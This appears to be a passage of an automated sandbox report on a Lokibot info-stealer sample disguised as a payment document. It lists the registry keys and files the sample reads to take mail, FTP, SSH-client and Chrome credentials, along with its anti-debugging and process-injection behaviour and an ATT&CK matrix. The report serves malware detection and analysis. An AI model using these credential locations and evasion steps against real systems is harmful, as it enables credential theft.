Source: Yara match	File source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wcycejenv.exe PID: 5332, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0042E02E push 59000002h; ret	1_2_0042E035
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00408250 push ecx; ret	1_2_00408263
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00444D5B push ecx; ret	1_2_00444D6E
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0042942E push esp; retn 0000h	1_2_0042943E
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AD4
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_00402AC0 push eax; ret	3_2_00402AFC

Source: C:\Users\user\Desktop\Payment_copy28476450.exe	File created: C:\Users\user\AppData\Local\Temp\wcycejenv.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)			Jump to dropped file

Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe TID: 5324

Thread sleep time: -660000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

API coverage: 2.4 %

Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405620
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,	0_2_00405FF6
Source: C:\Users\user\Desktop\Payment_copy28476450.exe	Code function: 0_2_00402654 FindFirstFileA,	0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004049D0 lstrcpyW,GetEnvironmentVariableW,lstrcpyW,lstrlenW,lstrcpyW,_wcsrchr,lstrcpyW,GetEnvironmentVariableW,lstrcpyW,lstrcpyW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,lstrlenW,GetFileAttributesW,lstrcatW,FindFirstFileW,FindClose,lstrcpyW,GetFileAttributesW,_wcsrchr,FindExecutableW,SHGetFileInfoW,CreateProcessW,GetLastError,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,	1_2_004049D0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00405030 lstrcpyW,lstrcatW,lstrcatW,lstrlenW,GetFileAttributesW,lstrcatW,FindFirstFileW,FindClose,GetFileAttributesW,	1_2_00405030
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00431227 FindFirstFileExW,	1_2_00431227
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004315E3 FindFirstFileExW,FindNextFileW,FindClose,	1_2_004315E3
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	3_2_00403D74

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\Payment_copy28476450.exe	API call chain: ExitProcess graph end node			graph_0-3335
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	API call chain: ExitProcess graph end node			graph_1-37775

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 1_2_00430A14 IsDebuggerPresent,

1_2_00430A14

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 1_2_00436D8B GetProcessHeap,

1_2_00436D8B

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00428A12 mov eax, dword ptr fs:[00000030h]	1_2_00428A12
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00428AA0 mov ecx, dword ptr fs:[00000030h]	1_2_00428AA0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00433950 mov eax, dword ptr fs:[00000030h]	1_2_00433950
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0043390D mov eax, dword ptr fs:[00000030h]	1_2_0043390D
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004339EE mov eax, dword ptr fs:[00000030h]	1_2_004339EE
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00433993 mov eax, dword ptr fs:[00000030h]	1_2_00433993
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00433AF8 mov eax, dword ptr fs:[00000030h]	1_2_00433AF8
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00433AB4 mov eax, dword ptr fs:[00000030h]	1_2_00433AB4
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00433B6D mov eax, dword ptr fs:[00000030h]	1_2_00433B6D
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00433B3C mov eax, dword ptr fs:[00000030h]	1_2_00433B3C
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]	3_2_0040317B

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0040812D SetUnhandledExceptionFilter,	1_2_0040812D
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_004085D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_004085D0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_0042BE3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0042BE3E
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: 1_2_00407F97 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00407F97

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\wcycejenv.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Process created: C:\Users\user\AppData\Local\Temp\wcycejenv.exe "C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	1_2_00436171
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_0042C1E7
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_0042C370
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_0042C378
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_0042C33E
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_0043647C
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_00436413
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: EnumSystemLocalesW,	1_2_00436517
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_004365A2
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetLocaleInfoW,	1_2_004367F5
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_0043691B
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetLocaleInfoW,	1_2_00436A21
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00436AF0
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: GetLocaleInfoW,	1_2_0042CC9F

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 1_2_004083E2 cpuid

1_2_004083E2

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 1_2_0042CCDE GetSystemTimeAsFileTime,

1_2_0042CCDE

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

0_2_0040324F

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 3_2_00406069 GetUserNameW,

3_2_00406069

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wcycejenv.exe PID: 5332, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.510358180.0000000000737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: PopPassword		3_2_0040D069
Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe	Code function: SmtpPassword		3_2_0040D069

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.wcycejenv.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	11 Virtualization/Sandbox Evasion	2 Credentials in Registry	12 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Account Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Obfuscated Files or Information	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	26 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
